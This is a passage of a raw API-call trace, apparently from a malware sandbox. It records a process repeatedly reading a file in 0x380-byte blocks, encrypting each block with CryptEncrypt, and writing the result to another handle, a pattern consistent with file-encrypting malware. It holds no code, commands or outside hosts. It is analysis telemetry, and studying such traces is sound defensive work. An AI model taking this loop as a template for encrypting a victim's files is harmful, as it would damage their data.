pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.694] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.694] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.694] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.694] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.695] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.696] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.696] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.696] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.696] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.696] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.696] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.697] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.697] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.697] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.697] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.697] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.697] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.698] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.699] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.699] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.699] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.699] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.699] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.699] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.700] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.700] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.700] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.700] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.700] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.701] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.701] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.701] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, 